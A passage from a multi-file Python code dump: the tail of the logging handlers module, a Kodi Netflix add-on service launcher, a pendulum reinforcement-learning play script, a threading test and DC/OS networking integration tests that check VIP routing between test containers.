logging.ERROR : win32evtlog.EVENTLOG_ERROR_TYPE,
logging.CRITICAL: win32evtlog.EVENTLOG_ERROR_TYPE,
}
except ImportError:
print("The Python Win32 extensions for NT (service, event "\
"logging) appear not to be available.")
self._welu = None
def getMessageID(self, record):
"""
Return the message ID for the event record. If you are using your
own messages, you could do this by having the msg passed to the
logger being an ID rather than a formatting string. Then, in here,
you could use a dictionary lookup to get the message ID. This
version returns 1, which is the base message ID in win32service.pyd.
"""
return 1
def getEventCategory(self, record):
"""
Return the event category for the record.
Override this if you want to specify your own categories. This version
returns 0.
"""
return 0
def getEventType(self, record):
"""
Return the event type for the record.
Override this if you want to specify your own types. This version does
a mapping using the handler's typemap attribute, which is set up in
__init__() to a dictionary which contains mappings for DEBUG, INFO,
WARNING, ERROR and CRITICAL. If you are using your own levels you will
either need to override this method or place a suitable dictionary in
the handler's typemap attribute.
"""
return self.typemap.get(record.levelno, self.deftype)
def emit(self, record):
"""
Emit a record.
Determine the message ID, event category and event type. Then
log the message in the NT event log.
"""
if self._welu:
try:
id = self.getMessageID(record)
cat = self.getEventCategory(record)
type = self.getEventType(record)
msg = self.format(record)
self._welu.ReportEvent(self.appname, id, cat, type, [msg])
except Exception:
self.handleError(record)
def close(self):
"""
Clean up this handler.
You can remove the application name from the registry as a
source of event log entries. However, if you do this, you will
not be able to see the events as you intended in the Event Log
Viewer - it needs to be able to access the registry to get the
DLL name.
"""
#self._welu.RemoveSourceFromRegistry(self.appname, self.logtype)
logging.Handler.close(self)
class HTTPHandler(logging.Handler):
"""
A class which sends records to a Web server, using either GET or
POST semantics.
"""
def __init__(self, host, url, method="GET", secure=False, credentials=None,
context=None):
"""
Initialize the instance with the host, the request URL, and the method
("GET" or "POST")
"""
logging.Handler.__init__(self)
method = method.upper()
if method not in ["GET", "POST"]:
raise ValueError("method must be GET or POST")
if not secure and context is not None:
raise ValueError("context parameter only makes sense "
"with secure=True")
self.host = host
self.url = url
self.method = method
self.secure = secure
self.credentials = credentials
self.context = context
def mapLogRecord(self, record):
"""
Default implementation of mapping the log record into a dict
that is sent as the CGI data. Overwrite in your class.
Contributed by Franz Glasner.
"""
return record.__dict__
def emit(self, record):
"""
Emit a record.
Send the record to the Web server as a percent-encoded dictionary
"""
try:
import http.client, urllib.parse
host = self.host
if self.secure:
h = http.client.HTTPSConnection(host, context=self.context)
else:
h = http.client.HTTPConnection(host)
url = self.url
data = urllib.parse.urlencode(self.mapLogRecord(record))
if self.method == "GET":
if (url.find('?') >= 0):
sep = '&'
else:
sep = '?'
url = url + "%c%s" % (sep, data)
h.putrequest(self.method, url)
# support multiple hosts on one IP address...
# need to strip optional :port from host, if present
i = host.find(":")
if i >= 0:
host = host[:i]
# See issue #30904: putrequest call above already adds this header
# on Python 3.x.
# h.putheader("Host", host)
if self.method == "POST":
h.putheader("Content-type",
"application/x-www-form-urlencoded")
h.putheader("Content-length", str(len(data)))
if self.credentials:
import base64
s = ('%s:%s' % self.credentials).encode('utf-8')
s = 'Basic ' + base64.b64encode(s).strip().decode('ascii')
h.putheader('Authorization', s)
h.endheaders()
if self.method == "POST":
h.send(data.encode('utf-8'))
h.getresponse() #can't do anything with the result
except Exception:
self.handleError(record)
class BufferingHandler(logging.Handler):
"""
A handler class which buffers logging records in memory. Whenever each
record is added to the buffer, a check is made to see if the buffer should
be flushed. If it should, then flush() is expected to do what's needed.
"""
def __init__(self, capacity):
"""
Initialize the handler with the buffer size.
"""
logging.Handler.__init__(self)
self.capacity = capacity
self.buffer = []
def shouldFlush(self, record):
"""
Should the handler flush its buffer?
Returns true if the buffer is up to capacity. This method can be
overridden to implement custom flushing strategies.
"""
return (len(self.buffer) >= self.capacity)
def emit(self, record):
"""
Emit a record.
Append the record. If shouldFlush() tells us to, call flush() to process
the buffer.
"""
self.buffer.append(record)
if self.shouldFlush(record):
self.flush()
def flush(self):
"""
Override to implement custom flushing behaviour.
This version just zaps the buffer to empty.
"""
self.acquire()
try:
self.buffer = []
finally:
self.release()
def close(self):
"""
Close the handler.
This version just flushes and chains to the parent class' close().
"""
try:
self.flush()
finally:
logging.Handler.close(self)
class MemoryHandler(BufferingHandler):
"""
A handler class which buffers logging records in memory, periodically
flushing them to a target handler. Flushing occurs whenever the buffer
is full, or when an event of a certain severity or greater is seen.
"""
def __init__(self, capacity, flushLevel=logging.ERROR, target=None,
flushOnClose=True):
"""
Initialize the handler with the buffer size, the level at which
flushing should occur and an optional target.
Note that without a target being set either here or via setTarget(),
a MemoryHandler is no use to anyone!
The ``flushOnClose`` argument is ``True`` for backward compatibility
reasons - the old behaviour is that when the handler is closed, the
buffer is flushed, even if the flush level hasn't been exceeded nor the
capacity exceeded. To prevent this, set ``flushOnClose`` to ``False``.
"""
BufferingHandler.__init__(self, capacity)
self.flushLevel = flushLevel
self.target = target
# See Issue #26559 for why this has been added
self.flushOnClose = flushOnClose
def shouldFlush(self, record):
"""
Check for buffer full or a record at the flushLevel or higher.
"""
return (len(self.buffer) >= self.capacity) or \
(record.levelno >= self.flushLevel)
def setTarget(self, target):
"""
Set the target handler for this handler.
"""
self.target = target
def flush(self):
"""
For a MemoryHandler, flushing means just sending the buffered
records to the target, if there is one. Override if you want
different behaviour.
The record buffer is also cleared by this operation.
"""
self.acquire()
try:
if self.target:
for record in self.buffer:
self.target.handle(record)
self.buffer = []
finally:
self.release()
def close(self):
"""
Flush, if appropriately configured, set the target to None and lose the
buffer.
"""
try:
if self.flushOnClose:
self.flush()
finally:
self.acquire()
try:
self.target = None
BufferingHandler.close(self)
finally:
self.release()
class QueueHandler(logging.Handler):
"""
This handler sends events to a queue. Typically, it would be used together
with a multiprocessing Queue to centralise logging to file in one process
(in a multi-process application), so as to avoid file write contention
between processes.
This code is new in Python 3.2, but this class can be copy pasted into
user code for use with earlier Python versions.
"""
def __init__(self, queue):
"""
Initialise an instance, using the passed queue.
"""
logging.Handler.__init__(self)
self.queue = queue
def enqueue(self, record):
"""
Enqueue a record.
The base implementation uses put_nowait. You may want to override
this method if you want to use blocking, timeouts or custom queue
implementations.
"""
self.queue.put_nowait(record)
def prepare(self, record):
"""
Prepares a record for queuing. The object returned by this method is
enqueued.
The base implementation formats the record to merge the message
and arguments, and removes unpickleable items from the record
in-place.
You might want to override this method if you want to convert
the record to a dict or JSON string, or send a modified copy
of the record while leaving the original intact.
"""
# The format operation gets traceback text into record.exc_text
# (if there's exception data), and also returns the formatted
# message. We can then use this to replace the original
# msg + args, as these might be unpickleable. We also zap the
# exc_info and exc_text attributes, as they are no longer
# needed and, if not None, will typically not be pickleable.
msg = self.format(record)
record.message = msg
record.msg = msg
record.args = None
record.exc_info = None
record.exc_text = None
return record
def emit(self, record):
"""
Emit a record.
Writes the LogRecord to the queue, preparing it for pickling first.
"""
try:
self.enqueue(self.prepare(record))
except Exception:
self.handleError(record)
class QueueListener(object):
"""
This class implements an internal threaded listener which watches for
LogRecords being added to a queue, removes them and passes them to a
list of handlers for processing.
"""
_sentinel = None
def __init__(self, queue, *handlers, respect_handler_level=False):
"""
Initialise an instance with the specified queue and
handlers.
"""
self.queue = queue
self.handlers = handlers
self._thread = None
self.respect_handler_level = respect_handler_level
def dequeue(self, block):
"""
Dequeue a record and return it, optionally blocking.
The base implementation uses get. You may want to override this method
if you want to use timeouts or work with custom queue implementations.
"""
return self.queue.get(block)
def start(self):
"""
Start the listener.
This starts up a background thread to monitor the queue for
LogRecords to process.
"""
self._thread = t = threading.Thread(target=self._monitor)
t.daemon = True
t.start()
def prepare(self , record):
"""
Prepare a record for handling.
This method just returns the passed-in record. You may want to
override this method if you need to do any custom marshalling or
manipulation of the record before passing it to the handlers.
"""
return record
def handle(self, record):
"""
Handle a record.
This just loops through the handlers offering them the record
to handle.
"""
record = self.prepare(record)
for handler in self.handlers:
if not self.respect_handler_level:
process = True
else:
process = record.levelno >= handler.level
if process:
handler.handle(record)
def _monitor(self):
"""
Monitor the queue for records, and ask the handler
to deal with them.
This method runs on a separate, internal thread.
The thread will terminate if it sees a sentinel object in the queue.
"""
q = self.queue
has_task_done = hasattr(q, 'task_done')
while True:
try:
record = self.dequeue(True)
if record is self._sentinel:
break
self.handle(record)
if has_task_done:
q.task_done()
except queue.Empty:
break
def enqueue_sentinel(self):
"""
This is used to enqueue the sentinel record.
The base implementation uses put_nowait. You may want to override this
method if you want to use timeouts or work with custom queue
implementations.
"""
self.queue.put_nowait(self._sentinel)
def stop(self):
"""
Stop the listener.
This asks the thread to terminate, and then waits for it to do so.
Note that if you don't call this before your application exits, there
may be some records still left on the queue, which won't be processed.
"""
self.enqueue_sentinel()
self._thread.join()
self._thread = None
|
run_service.py
|
# -*- coding: utf-8 -*-
"""
Copyright (C) 2017 Sebastian Golasch (plugin.video.netflix)
Functions for starting the service
SPDX-License-Identifier: MIT
See LICENSES/MIT.md for more information.
"""
import threading
from socket import gaierror
from resources.lib.common import select_port, get_local_string, WndHomeProps
from resources.lib.globals import G
from resources.lib.upgrade_controller import check_service_upgrade
from resources.lib.utils.logging import LOG
class NetflixService:
"""
Netflix addon service
"""
SERVERS = []
HOST_ADDRESS = '127.0.0.1'
def __init__(self):
self.controller = None
self.library_updater = None
def init_servers(self):
"""Initialize the http servers"""
try:
# Import modules here to intercept possible missing libraries on linux systems
from resources.lib.services.msl.http_server import MSLTCPServer
from resources.lib.services.nfsession.http_server import NetflixTCPServer
from resources.lib.services.cache.http_server import CacheTCPServer
# Do not change the init order of the servers,
# MSLTCPServer must always be initialized first to get the DRM info
self.SERVERS = [
{
'name': 'MSL',
'class': MSLTCPServer,
'instance': None,
'thread': None
}, {
'name': 'NS',
'class': NetflixTCPServer,
'instance': None,
'thread': None
}, {
'name': 'CACHE',
'class': CacheTCPServer,
'instance': None,
'thread': None
}
]
for server in self.SERVERS:
self._init_server(server)
return True
except Exception as exc: # pylint: disable=broad-except
LOG.error('Background services do not start due to the following error')
import traceback
LOG.error(traceback.format_exc())
if isinstance(exc, gaierror):
message = ('Something is wrong in your network localhost configuration.\r\n'
'It is possible that the hostname {} can not be resolved.').format(self.HOST_ADDRESS)
elif isinstance(exc, ImportError):
message = ('In your system is missing some required library to run Netflix.\r\n'
'Read how to install the add-on in the GitHub Readme.\r\n'
'Error details: {}'.format(exc))
else:
message = str(exc)
self._set_service_status('error', message)
return False
def _init_server(self, server):
server['class'].allow_reuse_address = True
server['instance'] = server['class'](
(self.HOST_ADDRESS, select_port(server['name']))
)
server['thread'] = threading.Thread(target=server['instance'].serve_forever)
def start_services(self):
"""
Start the background services
"""
from resources.lib.services.playback.action_controller import ActionController
from resources.lib.services.library_updater import LibraryUpdateService
for server in self.SERVERS:
server['instance'].server_activate()
server['instance'].timeout = 1
server['thread'].start()
LOG.info('[{}] Thread started'.format(server['name']))
self.controller = ActionController()
self.library_updater = LibraryUpdateService()
# We reset the value in case of any eventuality (add-on disabled, update, etc)
WndHomeProps[WndHomeProps.CURRENT_DIRECTORY] = None
# Mark the service as active
self._set_service_status('running')
if not G.ADDON.getSettingBool('disable_startup_notification'):
from resources.lib.kodi.ui import show_notification
show_notification(get_local_string(30110))
def shutdown(self):
"""
Stop the background services
"""
self._set_service_status('stopped')
for server in self.SERVERS:
server['instance'].shutdown()
server['instance'].server_close()
server['instance'] = None
server['thread'].join()
server['thread'] = None
LOG.info('Stopped MSL Service')
def run(self):
"""Main loop. Runs until xbmc.Monitor requests abort"""
try:
self.start_services()
except Exception as exc: # pylint: disable=broad-except
self._set_service_status('stopped')
import traceback
from resources.lib.kodi.ui import show_addon_error_info
LOG.error(traceback.format_exc())
show_addon_error_info(exc)
return
while not self.controller.abortRequested():
if self._tick_and_wait_for_abort():
break
self.shutdown()
def _tick_and_wait_for_abort(self):
try:
self.controller.on_service_tick()
self.library_updater.on_service_tick()
G.CACHE_MANAGEMENT.on_service_tick()
except Exception as exc: # pylint: disable=broad-except
import traceback
from resources.lib.kodi.ui import show_notification
LOG.error(traceback.format_exc())
show_notification(': '.join((exc.__class__.__name__, str(exc))))
return self.controller.waitForAbort(1)
def _set_service_status(self, status, message=None):
"""Save the service status to a Kodi property"""
from json import dumps
status = {'status': status, 'message': message}
WndHomeProps[WndHomeProps.SERVICE_STATUS] = dumps(status)
def run(argv):
# Initialize globals right away to avoid stale values from the last addon invocation.
# Otherwise Kodi's reuseLanguageInvoker will cause some really quirky behavior!
# PR: https://github.com/xbmc/xbmc/pull/13814
G.init_globals(argv)
check_service_upgrade()
netflix_service = NetflixService()
if netflix_service.init_servers():
netflix_service.run()
|
play.py
|
# https://github.com/openai/gym/blob/master/gym/envs/classic_control/pendulum.py
# https://mspries.github.io/jimmy_pendulum.html
#!/usr/bin/env python3
import math
import time
import grpc
import torch
import os, sys
import numpy as np
current_path = os.path.dirname(os.path.realpath(__file__))
PROJECT_HOME = os.path.abspath(os.path.join(current_path, os.pardir, os.pardir))
if PROJECT_HOME not in sys.path:
sys.path.append(PROJECT_HOME)
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))))
print("PyTorch Version", torch.__version__)
os.environ['KMP_DUPLICATE_LIB_OK'] = 'True'
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
from codes.c_models.continuous_action.continuous_action_model import ContinuousActionModel
from codes.e_utils.reward_changer import RewardChanger
from codes.e_utils import rl_utils
from codes.e_utils.common_utils import load_model, map_range
from codes.e_utils.logger import get_logger
from codes.e_utils.names import EnvironmentName, AgentMode
from codes.e_utils.rl_utils import get_environment_input_output_info, MODEL_ZOO_SAVE_DIR, MODEL_SAVE_FILE_PREFIX
from codes.b_environments.quanser_rotary_inverted_pendulum import blender_service_pb2_grpc
from codes.b_environments.quanser_rotary_inverted_pendulum.blender_service_pb2 import BlenderRequest
my_logger = get_logger("openai_pendulum_ddpg")
def play_main(params, env):
observation_shape, action_shape, num_outputs, action_n, action_min, action_max = get_environment_input_output_info(
env
)
agent = rl_utils.get_rl_agent(
observation_shape, action_shape, num_outputs, action_n, action_min, action_max, worker_id=-1, params=params, device=device
)
load_model(MODEL_ZOO_SAVE_DIR, MODEL_SAVE_FILE_PREFIX, agent, inquery=False)
agent.agent_mode = AgentMode.PLAY
agent.model.eval()
agent.test_model.load_state_dict(agent.model.state_dict())
agent.test_model.eval()
num_step = 0
num_episode = 0
while True:
done = False
episode_reward = 0
if "Bullet" in params.ENVIRONMENT_ID.value:
env.render()
state = env.reset()
num_episode += 1
num_episode_step = 0
agent_state = rl_utils.initial_agent_state()
while not done:
env.render()
num_step += 1
num_episode_step += 1
state = np.expand_dims(state, axis=0)
action, agent_state, = agent(state, agent_state)
if isinstance(agent.model, ContinuousActionModel):
action = map_range(
np.asarray(action),
np.ones_like(agent.action_min) * -1.0, np.ones_like(agent.action_max),
agent.action_min, agent.action_max
)
if action.ndim == 2:
action = action[0]
next_state, reward, done, info = env.step(action)
if isinstance(env, RewardChanger):
reward = env.reverse_reward(reward)
episode_reward += reward
state = next_state
# if num_step % 1000 == 0:
# print("EPISODE: {0}, EPISODE STEPS: {1}, TOTAL STEPS: {2}".format(
# num_episode, num_episode_step, num_step
# ))
if params.ENVIRONMENT_ID not in [
EnvironmentName.PENDULUM_MATLAB_V0,
EnvironmentName.PENDULUM_MATLAB_DOUBLE_RIP_V0,
EnvironmentName.REAL_DEVICE_RIP,
EnvironmentName.REAL_DEVICE_DOUBLE_RIP,
EnvironmentName.QUANSER_SERVO_2
]:
time.sleep(0.01)
print("EPISODE: {0}, EPISODE STEPS: {1}, TOTAL STEPS: {2}, EPISODE DONE --> EPISODE REWARD: {3}".format(
num_episode, num_episode_step, num_step, episode_reward
))
time.sleep(0.1)
def quanser_blender(server_obj_blender, idx, env):
while True:
blender_response = server_obj_blender.step_blender(BlenderRequest(
idx=idx, pendulum_1_radian=math.degrees(env.pendulum_radian), motor_radian=math.degrees(env.motor_radian),
pendulum_2_radian=0
))
if not blender_response.is_receive:
raise ValueError()
time.sleep(0.005)
def rip_blender(server_obj_blender, idx, env):
while True:
blender_response = server_obj_blender.step_blender(BlenderRequest(
idx=idx, pendulum_1_radian=math.degrees(env.pendulum_1_position),
motor_radian=math.degrees(env.motor_position),
pendulum_2_radian=math.degrees(env.pendulum_2_position)
))
if not blender_response.is_receive:
raise ValueError()
time.sleep(0.001)
if __name__ == "__main__":
from codes.a_config.parameters import PARAMETERS as parameters
params = parameters
env = rl_utils.get_single_environment(params=params, mode=AgentMode.PLAY)
print("env:", params.ENVIRONMENT_ID)
print("observation_space:", env.observation_space)
print("action_space:", env.action_space)
if params.ENVIRONMENT_ID in [EnvironmentName.QUANSER_SERVO_2, EnvironmentName.REAL_DEVICE_RIP,
EnvironmentName.REAL_DEVICE_DOUBLE_RIP]:
import threading
if params.SERVER_IDX == 1:
RIP_SERVER = '10.42.0.201'
IDX = 0
elif params.SERVER_IDX == 2:
RIP_SERVER = '10.42.0.222'
IDX = 1
elif params.SERVER_IDX == 3:
RIP_SERVER = '10.42.0.219'
IDX = 2
elif params.SERVER_IDX == 4:
RIP_SERVER = '192.168.0.32'
IDX = 4
elif params.SERVER_IDX == 5:
RIP_SERVER = '192.168.0.34'
IDX = 3
channel_blender = grpc.insecure_channel('{0}:50051'.format('192.168.0.5'))
server_obj_blender = blender_service_pb2_grpc.BlenderRIPStub(channel_blender)
if params.SERVER_IDX == 4 or params.SERVER_IDX == 5:
quanser_blender_start = threading.Thread(target=quanser_blender, args=(server_obj_blender, IDX, env))
quanser_blender_start.start()
elif params.SERVER_IDX == 1 or params.SERVER_IDX == 2 or params.SERVER_IDX == 3:
rip_blender_start = threading.Thread(target=rip_blender, args=(server_obj_blender, IDX, env))
rip_blender_start.start()
play_main(params, env)
|
test_sharedmodel.py
|
import time
import threading
def acquire_and_keep(s):
with s:
time.sleep(1)
class TestSharedModel:
def test_wait_if_locked(self, init_shared_model):
"""
Check if a thread has to wait if the model in
already in use.
"""
s = init_shared_model("TEST", "TEST")
t1 = threading.Thread(target=acquire_and_keep, args=s)
t2 = threading.Thread(target=acquire_and_keep, args=s)
t1.start()
t2.start()
assert t2.is_alive()
def test_acquire_after_unlocked(self, init_shared_model):
"""
Check if the model can be acquired after it's been
unlocked.
"""
s = init_shared_model("TEST", "TEST")
t1 = threading.Thread(target=acquire_and_keep, args=s)
t1.start()
model = s.acquire_model()
assert model == "TEST"
|
test_networking.py
|
import contextlib
import enum
import itertools
import json
import logging
import subprocess
import threading
import time
import uuid
from collections import deque
import pytest
import requests
import retrying
import test_helpers
from dcos_test_utils import marathon
from dcos_test_utils.helpers import assert_response_ok
__maintainer__ = 'urbanserj'
__contact__ = 'dcos-networking@mesosphere.io'
log = logging.getLogger(__name__)
GLOBAL_PORT_POOL = iter(range(10000, 32000))
GLOBAL_OCTET_POOL = itertools.cycle(range(254, 10, -1))
class Container(enum.Enum):
POD = 'POD'
class MarathonApp:
def __init__(self, container, network, host,
vip=None, network_name=None,
app_name_fmt=None, host_port=None):
if host_port is None:
host_port = unused_port()
args = {
'app_name_fmt': app_name_fmt,
'network': network,
'host_port': host_port,
'host_constraint': host,
'vip': vip,
'container_type': container,
'healthcheck_protocol': marathon.Healthcheck.MESOS_HTTP
}
if network == marathon.Network.USER:
args['container_port'] = unused_port()
if network_name is not None:
args['network_name'] = network_name
if vip is not None:
del args['host_port']
self.app, self.uuid = test_helpers.marathon_test_app(**args)
# allow this app to run on public slaves
self.app['acceptedResourceRoles'] = ['*', 'slave_public']
self.id = self.app['id']
def __str__(self):
return str(self.app)
def deploy(self, dcos_api_session):
return dcos_api_session.marathon.post('/v2/apps', json=self.app).raise_for_status()
@retrying.retry(
wait_fixed=5000,
stop_max_delay=20 * 60 * 1000)
def wait(self, dcos_api_session):
r = dcos_api_session.marathon.get('/v2/apps/{}'.format(self.id))
assert_response_ok(r)
self._info = r.json()
assert self._info['app']['tasksHealthy'] == self.app['instances']
def info(self, dcos_api_session):
try:
if self._info['app']['tasksHealthy'] != self.app['instances']:
raise Exception("Number of Healthy Tasks not equal to number of instances.")
except Exception:
self.wait(dcos_api_session)
return self._info
def hostport(self, dcos_api_session):
info = self.info(dcos_api_session)
task = info['app']['tasks'][0]
if 'networks' in self.app and \
self.app['networks'][0]['mode'] == 'container' and \
self.app['networks'][0]['name'] == 'dcos':
host = task['ipAddresses'][0]['ipAddress']
port = self.app['container']['portMappings'][0]['containerPort']
else:
host = task['host']
port = task['ports'][0]
return host, port
def purge(self, dcos_api_session):
return dcos_api_session.marathon.delete('/v2/apps/{}'.format(self.id))
class MarathonPod:
def __init__(self, network, host, vip=None, pod_name_fmt='/integration-test-{}'):
self._network = network
container_port = 0
if network is not marathon.Network.HOST:
container_port = unused_port()
# ENDPOINT_TEST will be computed from the `endpoints` definition. See [1], [2]
# [1] https://dcos.io/docs/1.10/deploying-services/pods/technical-overview/#environment-variables
# [2] https://github.com/mesosphere/marathon/blob/v1.5.0/
# src/main/scala/mesosphere/mesos/TaskGroupBuilder.scala#L420-L443
port = '$ENDPOINT_TEST' if network == marathon.Network.HOST else container_port
self.uuid = uuid.uuid4().hex
self.id = pod_name_fmt.format(self.uuid)
self.app = {
'id': self.id,
'scheduling': {'placement': {'acceptedResourceRoles': ['*', 'slave_public']}},
'containers': [{
'name': 'app-{}'.format(self.uuid),
'resources': {'cpus': 0.01, 'mem': 32},
'image': {'kind': 'DOCKER', 'id': 'debian:stretch-slim'},
'exec': {'command': {
'shell': '/opt/mesosphere/bin/dcos-shell python '
'/opt/mesosphere/active/dcos-integration-test/util/python_test_server.py '
'{}'.format(port)
}},
'volumeMounts': [{'name': 'opt', 'mountPath': '/opt/mesosphere'}],
'endpoints': [{'name': 'test', 'protocol': ['tcp'], 'hostPort': unused_port()}],
'environment': {'DCOS_TEST_UUID': self.uuid, 'HOME': '/'}
}],
'networks': [{'mode': 'host'}],
'volumes': [{'name': 'opt', 'host': '/opt/mesosphere'}]
}
if host is not None:
self.app['scheduling']['placement']['constraints'] = \
[{'fieldName': 'hostname', 'operator': 'CLUSTER', 'value': host}]
if vip is not None:
self.app['containers'][0]['endpoints'][0]['labels'] = \
{'VIP_0': vip}
if network == marathon.Network.USER:
del self.app['containers'][0]['endpoints'][0]['hostPort']
self.app['containers'][0]['endpoints'][0]['containerPort'] = container_port
self.app['networks'] = [{'name': 'dcos', 'mode': 'container'}]
elif network == marathon.Network.BRIDGE:
self.app['containers'][0]['endpoints'][0]['containerPort'] = container_port
self.app['networks'] = [{'mode': 'container/bridge'}]
def __str__(self):
return str(self.app)
def deploy(self, dcos_api_session):
return dcos_api_session.marathon.post('/v2/pods', json=self.app).raise_for_status()
@retrying.retry(
wait_fixed=5000,
stop_max_delay=20 * 60 * 1000,
retry_on_result=lambda res: res is False)
def wait(self, dcos_api_session):
r = dcos_api_session.marathon.get('/v2/pods/{}::status'.format(self.id))
assert_response_ok(r)
self._info = r.json()
error_msg = 'Status was {}: {}'.format(self._info['status'], self._info.get('message', 'no message'))
assert self._info['status'] == 'STABLE', error_msg
def info(self, dcos_api_session):
try:
if self._info['status'] != 'STABLE':
raise Exception("The status information is not Stable!")
except Exception:
self.wait(dcos_api_session)
return self._info
def hostport(self, dcos_api_session):
info = self.info(dcos_api_session)
if self._network == marathon.Network.USER:
host = info['instances'][0]['networks'][0]['addresses'][0]
port = self.app['containers'][0]['endpoints'][0]['containerPort']
else:
host = info['instances'][0]['agentHostname']
port = info['instances'][0]['containers'][0]['endpoints'][0]['allocatedHostPort']
return host, port
def purge(self, dcos_api_session):
return dcos_api_session.marathon.delete('/v2/pods/{}'.format(self.id))
def unused_port():
global GLOBAL_PORT_POOL
return next(GLOBAL_PORT_POOL)
def unused_octet():
global GLOBAL_OCTET_POOL
return next(GLOBAL_OCTET_POOL)
def lb_enabled():
expanded_config = test_helpers.get_expanded_config()
return expanded_config['enable_lb'] == 'true'
@retrying.retry(wait_fixed=2000,
stop_max_delay=5 * 60 * 1000,
retry_on_result=lambda ret: ret is None)
def ensure_routable(cmd, host, port, json_output=True):
proxy_uri = 'http://{}:{}/run_cmd'.format(host, port)
log.info('Sending {} data: {}'.format(proxy_uri, cmd))
response = requests.post(proxy_uri, data=cmd, timeout=5).json()
log.info('Requests Response: {}'.format(repr(response)))
if response['status'] != 0:
return None
return json.loads(response['output']) if json_output else response['output']
def generate_vip_app_permutations():
""" Generate all possible network interface permutations for applying vips
"""
containers = list(marathon.Container) + [Container.POD]
return [(container, vip_net, proxy_net)
for container in containers
for vip_net in list(marathon.Network)
for proxy_net in list(marathon.Network)]
def workload_test(dcos_api_session, container, app_net, proxy_net, ipv6, same_host):
(vip, hosts, cmd, origin_app, proxy_app, _pm_app) = \
vip_workload_test(dcos_api_session, container,
app_net, proxy_net, ipv6, True, same_host, False)
return (hosts, origin_app, proxy_app)
@pytest.mark.first
def test_docker_image_availablity():
assert test_helpers.docker_pull_image("debian:stretch-slim"), "docker pull failed for image used in the test"
@pytest.mark.slow
@pytest.mark.parametrize('same_host', [True, False])
def test_ipv6(dcos_api_session, same_host):
''' Testing autoip, containerip and *.mesos FQDN on ipv6 overlay network '''
(hosts, origin_app, proxy_app) = \
workload_test(dcos_api_session, marathon.Container.DOCKER,
marathon.Network.USER, marathon.Network.USER, True, same_host)
log.info('Starting apps :: Hosts: {}'.format(hosts))
log.info("Origin app: {}".format(origin_app))
origin_app.deploy(dcos_api_session)
log.info("Proxy app: {}".format(proxy_app))
proxy_app.deploy(dcos_api_session)
origin_app.wait(dcos_api_session)
proxy_app.wait(dcos_api_session)
log.info('Apps are ready')
origin_app_info = origin_app.info(dcos_api_session)
origin_port = origin_app_info['app']['container']['portMappings'][0]['containerPort']
proxy_host, proxy_port = proxy_app.hostport(dcos_api_session)
dns_name = '-'.join(reversed(origin_app.id.split('/')[1:]))
try:
zones = ["marathon.autoip.dcos.thisdcos.directory",
"marathon.containerip.dcos.thisdcos.directory",
"marathon.mesos"]
for zone in zones:
cmd = '{} --ipv6 http://{}/test_uuid'.format(
'/opt/mesosphere/bin/curl -s -f -m 5',
'{}.{}:{}'.format(dns_name, zone, origin_port))
log.info("Remote command: {}".format(cmd))
assert ensure_routable(cmd, proxy_host, proxy_port)['test_uuid'] == origin_app.uuid
finally:
log.info('Purging application: {}'.format(origin_app.id))
origin_app.purge(dcos_api_session)
log.info('Purging application: {}'.format(proxy_app.id))
proxy_app.purge(dcos_api_session)
@pytest.mark.slow
def test_vip_ipv6(dcos_api_session):
return test_vip(dcos_api_session, marathon.Container.DOCKER,
marathon.Network.USER, marathon.Network.USER, ipv6=True)
@pytest.mark.slow
@pytest.mark.parametrize(
'container',
list(marathon.Container))
def test_vip_port_mapping(dcos_api_session,
container: marathon.Container,
vip_net: marathon.Network=marathon.Network.HOST,
proxy_net: marathon.Network=marathon.Network.HOST):
return test_vip(dcos_api_session, container, vip_net, proxy_net, with_port_mapping_app=True)
@pytest.mark.slow
@pytest.mark.parametrize(
'container,vip_net,proxy_net',
generate_vip_app_permutations())
def test_vip(dcos_api_session,
container: marathon.Container,
vip_net: marathon.Network,
proxy_net: marathon.Network,
ipv6: bool=False,
with_port_mapping_app=False):
'''Test VIPs between the following source and destination configurations:
* containers: DOCKER, UCR and NONE
* networks: USER, BRIDGE, HOST
* agents: source and destnations on same agent or different agents
* vips: named and unnamed vip
Origin app will be deployed to the cluster with a VIP. Proxy app will be
deployed either to the same host or elsewhere. Finally, a thread will be
started on localhost (which should be a master) to submit a command to the
proxy container that will ping the origin container VIP and then assert
that the expected origin app UUID was returned
'''
if not lb_enabled():
pytest.skip('Load Balancer disabled')
errors = []
tests = setup_vip_workload_tests(dcos_api_session, container, vip_net, proxy_net, ipv6, with_port_mapping_app)
for vip, hosts, cmd, origin_app, proxy_app, pm_app in tests:
log.info("Testing :: VIP: {}, Hosts: {}".format(vip, hosts))
log.info("Remote command: {}".format(cmd))
proxy_host, proxy_port = proxy_app.hostport(dcos_api_session)
try:
if ipv6 and len(hosts) < 2:
# NOTE: If proxy and origin apps run on the same host, IPv6 VIP works from
# proxy task's network namespace only when bridge-nf-call-ip6tables is enabled, i.e
# sysctl -w net.bridge.bridge-nf-call-ip6tables=1
# JIRA: https://jira.mesosphere.com/browse/DCOS_OSS-5122
continue
assert ensure_routable(cmd, proxy_host, proxy_port)['test_uuid'] == origin_app.uuid
except Exception as e:
log.error('Exception: {}'.format(e))
errors.append(e)
finally:
log.info('Purging application: {}'.format(origin_app.id))
origin_app.purge(dcos_api_session)
log.info('Purging application: {}'.format(proxy_app.id))
proxy_app.purge(dcos_api_session)
if pm_app is not None:
log.info('Purging application: {}'.format(pm_app.id))
pm_app.purge(dcos_api_session)
assert not errors
def setup_vip_workload_tests(dcos_api_session, container, vip_net, proxy_net, ipv6, with_port_mapping_app=False):
same_hosts = [True, False] if len(dcos_api_session.all_slaves) > 1 else [True]
tests = [vip_workload_test(dcos_api_session, container, vip_net, proxy_net,
ipv6, named_vip, same_host, with_port_mapping_app)
for named_vip in [True, False]
for same_host in same_hosts]
for vip, hosts, cmd, origin_app, proxy_app, pm_app in tests:
# We do not need the service endpoints because we have deterministically assigned them
log.info('Starting apps :: VIP: {}, Hosts: {}'.format(vip, hosts))
log.info("Origin app: {}".format(origin_app))
origin_app.deploy(dcos_api_session)
log.info("Proxy app: {}".format(proxy_app))
proxy_app.deploy(dcos_api_session)
if pm_app is not None:
log.info("Port Mapping app: {}".format(pm_app))
pm_app.deploy(dcos_api_session)
for vip, hosts, cmd, origin_app, proxy_app, pm_app in tests:
log.info("Deploying apps :: VIP: {}, Hosts: {}".format(vip, hosts))
log.info('Deploying origin app: {}'.format(origin_app.id))
origin_app.wait(dcos_api_session)
log.info('Deploying proxy app: {}'.format(proxy_app.id))
proxy_app.wait(dcos_api_session)
if pm_app is not None:
